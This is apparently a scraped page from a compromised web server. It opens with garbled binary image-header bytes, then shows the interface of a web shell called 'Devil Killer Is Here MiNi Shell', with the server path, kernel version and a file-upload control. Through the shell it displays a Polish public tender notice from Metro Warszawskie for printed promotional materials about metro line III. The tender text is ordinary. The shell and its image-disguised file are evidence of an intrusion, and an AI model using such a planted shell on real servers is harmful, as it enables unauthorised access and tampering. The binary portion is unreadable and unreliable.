JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240517/0032917301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Materiały informacyjno-promocyjne dotyczące budowy III linii metra Etap I Praga </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">METRO WARSZAWSKIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015314592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wilczy Dół 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-798</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 655-46-73</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam-eh@metro.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://postepowania.metro.waw.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 1 - usługi transportowe</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Materiały informacyjno-promocyjne dotyczące budowy III linii metra Etap I Praga </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-321c22c8-03a0-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00329173</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://postepowania.metro.waw.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma Zakupowa Zamawiającego znajdująca się pod adresem:<br/>https://postepowania.metro.waw.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę wraz z załącznikami należy<br/>przesłać w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub e-dowodem (podpisem osobistym) lub<br/>podpisem zaufanym. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są w pkt 16.2<br/>Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1)	Administratorem danych osobowych osób fizycznych występujących w imieniu Wykonawcy , zwanych dalej „Danymi osobowymi”, jest Miasto St. Warszawa, reprezentowane przez Zarząd Transportu Miejskiego, w imieniu i na rzecz którego działa Metro Warszawskie Sp. z o.o. (dalej: &#34;MW&#34;), z siedzibą w Warszawie (02-798), ul. Wilczy Dół 5, tel. centrala: +48 22 655 40 00;<br/>2)	Kontakt do inspektora danych osobowych w MW: e-mail: iod@metro.waw.pl;<br/>3)	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem.<br/>4)	Odbiorcami Danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 Ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 - dalej „ustawa Pzp”);<br/>5)	Dane osobowe będą przechowywane przez okres 4 pełnych lat kalendarzowych liczonych od dnia 1 stycznia roku następnego od daty zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Obowiązek podania Danych osobowych bezpośrednio dotyczących osób fizycznych występujących w imieniu Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	W odniesieniu do Danych Osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Osoby fizyczne występujące w imieniu Wykonawcy mają:<br/>-	na podstawie art. 15 RODO prawo dostępu do Danych Osobowych ich dotyczących;<br/>-	na podstawie art. 16 RODO prawo do sprostowania ich Danych Osobowych; <br/>-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania Danych Osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy ww. osoba fizyczna uzna, że przetwarzanie jej Danych Osobowych narusza przepisy RODO lub ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j.: Dz.U. z 2019 r. poz. 1781);<br/>9)	Osobie fizycznej występującej w imieniu Wykonawcy nie przysługuje:<br/>-	prawo do usunięcia Danych Osobowych o którym mowa w art. 17 ust. 3 lit. b, d lub e RODO;<br/>-	prawo do przenoszenia Danych Osobowych, o którym mowa w art. 20 RODO; <br/>-	prawo sprzeciwu, wobec przetwarzania Danych Osobowych, o którym mowa w art. 21 RODO, gdyż podstawą prawną przetwarzania Danych Osobowych dotyczących ww. osoby fizycznej jest art. 6 ust. 1 lit. c RODO.<br/>10)	W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 * rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11) W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 * rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>12) Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 (prawo do ograniczenia przetwarzania) rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>* (prawo dostępu przysługujące osobie, której dane dotyczą)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WP.25.00035.2024.K.D.BEDA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem Zamówienia jest wydruk i dostawa materiałów informacyjno-promocyjnych dotyczących budowy III linii metra etap I Praga, w podziale na zadania.<br/>Zadanie 1 obejmuje wydruk broszury informacyjno – promocyjnej.<br/>Szczegółowy opis oraz wykaz materiałów informacyjno – promocyjnych objętych Przedmiotem Zamówienia w podziale na poszczególne Zadania został wyspecyfikowany w Specyfikacji Technicznej (zwanej dalej „ST”) stanowiącej załącznik nr 1 do SWZ i będącej jej integralną częścią.<br/>2.	Wykonawca może złożyć ofertę na jedno lub więcej Zadań z zastrzeżeniem, że w przypadku złożenia oferty na dane Zadanie, zakres oferty musi obejmować całe Zadanie, którego dotyczy oferta.<br/>3.	Przedmiot Zamówienia zostanie zrealizowany zgodnie z dokumentacją postępowania, tj. SWZ i jej załącznikami, w szczególności z ST oraz ze Wzorem Umowy stanowiącą załącznik nr 2 do SWZ.<br/>4.	W przypadku otrzymania dofinansowania z funduszy Unii Europejskiej, obejmującego Przedmiot niniejszego Zamówienia, Wykonawca będzie zobowiązany do stosowania wymogów związanych z promocją projektu, tj. zamieszczenia na materiałach promocyjno-informacyjnych logo programu oraz informacji <br/>o udziale Unii Europejskiej we współfinansowaniu projektu. <br/>5.	Zamawiający nie wymaga zatrudnienia na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023, poz. 1465 z późn. zm.), przez Wykonawcę lub Podwykonawcę, osób wykonujących czynności w trakcie realizacji Przedmiotu Zamówienia.<br/>6. Wykonawca zrealizuje Przedmiot Zamówienia z zachowaniem poniższych terminów:<br/>1)	Zamawiający w terminie do 2 dni roboczych od daty zawarcia umowy, przekaże Wykonawcy drogą elektroniczną projekty graficzne materiałów informacyjno - promocyjnych;<br/>2)	Wykonawca dostarczy broszury do Zamawiającego w terminie do 10 dni roboczych (lub w krótszym terminie zadeklarowanym w ofercie) od daty przekazania przez Zamawiającego projektów graficznych materiałów informacyjno - promocyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39294100-0 - Artykuły informacyjne i promocyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru oferty najkorzystniejszej w każdym z Zadań wyłącznie na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Ocenie punktowej zostaną poddane oferty Wykonawców, którzy nie podlegają wykluczeniu, a ich oferty nie zostały odrzucone.<br/>2. W niniejszym postępowaniu Zamawiający będzie oceniał oferty w każdym Zadaniu na podstawie następujących kryteriów i<br/>przyznanych im wag:<br/>1) Cena brutto za wykonania Zadania 60 %<br/>2) Skrócenie terminu realizacji Przedmiotu Zamówienia 40 %<br/>4. Oferty zostaną ocenione za pomocą systemu punktowego, zgodnie z poniższymi kryteriami:<br/>4.1. W Kryterium nr 1: Cena brutto wykonania Zadania (waga 60%).<br/>Maksymalna liczba punktów, jaką może uzyskać oferta - 60 pkt<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>K1 = (C min / C obliczana) X 60<br/>gdzie:<br/>K1 – liczba punktów przyznana ocenianej ofercie w ramach Kryterium nr 1,<br/>Cmin - najniższa „cena brutto za wykonanie Zadania” spośród ofert nieodrzuconych,<br/>Cobliczana – „cena brutto za wykonanie Zadania” oferty badanej.<br/>4.2. W Kryterium nr 2: Skrócenie terminu realizacji Przedmiotu Zamówienia (waga 40%).<br/>Maksymalna liczba punktów, jaką może uzyskać oferta - 40 pkt<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona wg poniższej gradacji uwzględniającej skrócenie terminu realizacji<br/>Przedmiotu Zamówienia w stosunku do maksymalnego terminu 10 dni roboczych .<br/>1 Skrócenie terminu o 4 dni robocze 10 pkt<br/>Skrócenie terminu o 5 dni roboczych 20 pkt<br/>Skrócenie terminu o 6 dni roboczych 30 pkt<br/>2 Skrócenie terminu o 7 dni roboczych 40 pkt<br/>5. Zamawiający wybierze w danym Zadaniu jako najkorzystniejszą ofertę Wykonawcy, który uzyska najwyższą łączną liczbę punktów<br/>w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ określoną w wyniku sumowania ilości punktów uzyskanych w każdym z<br/>ww. Kryteriów.<br/>6. Jeżeli nie będzie można wybrać najkorzystniejszej oferty w danym Zadaniu ze względu na to, że dwie lub więcej ofert uzyska<br/>najwyższą łączną liczbę punktów w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ, Zamawiający wybierze spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 23.6 SWZ, Zamawiający wezwie Wykonawców,<br/>którzy złożyli oferty, które uzyskały najwyższą łączną liczbę punktów w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ w<br/>danym Zadaniu, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych ni zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji Przedmiotu Zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem Zamówienia jest wydruk i dostawa materiałów informacyjno-promocyjnych dotyczących budowy III linii metra etap I Praga, w podziale na 2 zadania.<br/>Zadanie 2 obejmuje wykonanie ścianki informacyjno – promocyjnej wraz z wydrukiem. <br/>Szczegółowy opis oraz wykaz materiałów informacyjno – promocyjnych objętych Przedmiotem Zamówienia w podziale na poszczególne Zadania został wyspecyfikowany w Specyfikacji Technicznej (zwanej dalej „ST”) stanowiącej załącznik nr 1 do SWZ i będącej jej integralną częścią.<br/>2.	Wykonawca może złożyć ofertę na jedno lub więcej Zadań z zastrzeżeniem, że w przypadku złożenia oferty na dane Zadanie, zakres oferty musi obejmować całe Zadanie, którego dotyczy oferta.<br/>3.	Przedmiot Zamówienia zostanie zrealizowany zgodnie z dokumentacją postępowania, tj. SWZ i jej załącznikami, w szczególności z ST oraz ze Wzorem Umowy stanowiącą załącznik nr 2 do SWZ.<br/>4.	W przypadku otrzymania dofinansowania z funduszy Unii Europejskiej, obejmującego Przedmiot niniejszego Zamówienia, Wykonawca będzie zobowiązany do stosowania wymogów związanych z promocją projektu, tj. zamieszczenia na materiałach promocyjno-informacyjnych logo programu oraz informacji <br/>o udziale Unii Europejskiej we współfinansowaniu projektu. <br/>5.	Zamawiający nie wymaga zatrudnienia na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023, poz. 1465 z późn. zm.), przez Wykonawcę lub Podwykonawcę, osób wykonujących czynności w trakcie realizacji Przedmiotu Zamówienia.<br/>6. Wykonawca zrealizuje Przedmiot Zamówienia z zachowaniem poniższych terminów:<br/>1)	Zamawiający w terminie do 2 dni roboczych od daty zawarcia umowy, przekaże Wykonawcy drogą elektroniczną projekty graficzne materiałów informacyjno - promocyjnych;<br/>2)	Wykonawca dostarczy wykonane ścianki wraz z wydrukiem do Zamawiającego w terminie do 10 dni roboczych (lub w krótszym terminie zadeklarowanym w ofercie) od daty przekazania przez Zamawiającego projektów graficznych materiałów informacyjno - promocyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39294100-0 - Artykuły informacyjne i promocyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru oferty najkorzystniejszej w każdym z Zadań wyłącznie na podstawie<br/>kryteriów oceny ofert określonych w SWZ.<br/>2. Ocenie punktowej zostaną poddane oferty Wykonawców, którzy nie podlegają wykluczeniu, a ich oferty nie zostały odrzucone.<br/>2. W niniejszym postępowaniu Zamawiający będzie oceniał oferty w każdym Zadaniu na podstawie następujących kryteriów i<br/>przyznanych im wag:<br/>1) Cena brutto za wykonania Zadania 60 %<br/>2) Skrócenie terminu realizacji Przedmiotu Zamówienia 40 %<br/>4. Oferty zostaną ocenione za pomocą systemu punktowego, zgodnie z poniższymi kryteriami:<br/>4.1. W Kryterium nr 1: Cena brutto wykonania Zadania (waga 60%).<br/>Maksymalna liczba punktów, jaką może uzyskać oferta - 60 pkt<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona zgodnie z następującą formułą:<br/>K1 = (C min / C obliczana) X 60<br/>gdzie:<br/>K1 – liczba punktów przyznana ocenianej ofercie w ramach Kryterium nr 1,<br/>Cmin - najniższa „cena brutto za wykonanie Zadania” spośród ofert nieodrzuconych,<br/>Cobliczana – „cena brutto za wykonanie Zadania” oferty badanej.<br/>4.2. W Kryterium nr 2: Skrócenie terminu realizacji Przedmiotu Zamówienia (waga 40%).<br/>Maksymalna liczba punktów, jaką może uzyskać oferta - 40 pkt<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona wg poniższej gradacji uwzględniającej skrócenie terminu realizacji<br/>Przedmiotu Zamówienia w stosunku do maksymalnego terminu 10 dni roboczych .<br/>1 Skrócenie terminu o 4 dni robocze 10 pkt<br/>Skrócenie terminu o 5 dni roboczych 20 pkt<br/>Skrócenie terminu o 6 dni roboczych 30 pkt<br/>2 Skrócenie terminu o 7 dni roboczych 40 pkt<br/>5. Zamawiający wybierze w danym Zadaniu jako najkorzystniejszą ofertę Wykonawcy, który uzyska najwyższą łączną liczbę punktów<br/>w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ określoną w wyniku sumowania ilości punktów uzyskanych w każdym z<br/>ww. Kryteriów.<br/>6. Jeżeli nie będzie można wybrać najkorzystniejszej oferty w danym Zadaniu ze względu na to, że dwie lub więcej ofert uzyska<br/>najwyższą łączną liczbę punktów w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ, Zamawiający wybierze spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w pkt 23.6 SWZ, Zamawiający wezwie Wykonawców,<br/>którzy złożyli oferty, które uzyskały najwyższą łączną liczbę punktów w ocenie punktowej Kryteriów wskazanych w pkt 23.4 SWZ w<br/>danym Zadaniu, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> 